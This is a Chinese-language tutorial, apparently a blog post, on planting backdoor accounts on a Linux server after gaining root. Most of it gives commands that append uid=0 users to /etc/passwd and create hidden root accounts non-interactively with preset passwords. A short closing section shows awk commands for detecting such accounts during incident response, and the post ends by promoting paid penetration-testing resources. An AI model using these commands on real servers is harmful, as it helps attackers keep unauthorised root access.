一、本教程作用
1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防
二、增加超级用户帐号-教程
前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机)
2.1 第一种情况:可以交互且允许uid=0的用户远程登录
增加超级用户账号命令:
echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号
passwd cshm #修改cshm的密码为cshm123
ssh链接账户cshm:
输入账号:cshm 密码:cshm123 ,成功留下该账户后门,并且是root权限
2.2 第二种情况:可以交互且不允许uid=0的用户远程登录
如果系统不允许 uid=0 的用户远程登录(因为root的uid=0),可以增加一个普通用户账号 设置不允许root账户远程登录,参考链接:www.cnblogs.com/binblogs/p/…
命令:
增加超级用户账号命令:
echo "wxg:x:1000:1000::/:/bin/sh" >> /etc/passwd #增加普通用户账号
passwd wxg #修改wxg的密码为wxg147258369
之后xhell远程登录wxg测试,成功,但是root账户,及时输入正确的密码也是不能成功登录的
2.3 第三种情况:不交互无回显添加Linux密码
第一种:
useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg #创建账户wxg、密码123456且为root权限
useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg #创建账户wxg、密码123456且为root权限
得执行命令两次才可以
wxg的权限查看为root权限
第二种:
useradd test
echo "123456" | passwd --stdin test
权限较小
第三种:
useradd -u 0 -o -g root -G root user |echo -e "1qazwsx2wsx\n1qazwsx2wsx"|passwd user
也是得执行两次,并且对密码强度有要求
user的权限查看为root权限
三、增加超级用户帐号——应急响应发现
Linux下查看可以远程登录的账号信息:
awk '/\$1|\$6/{print $1}' /etc/shadow
查看特权账户,那些账户有root权限
awk -F: '$3==0 {print$1}' /etc/passwd
之后与服务器管理员沟通,就可以确定黑客增加的用户账号了。
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥\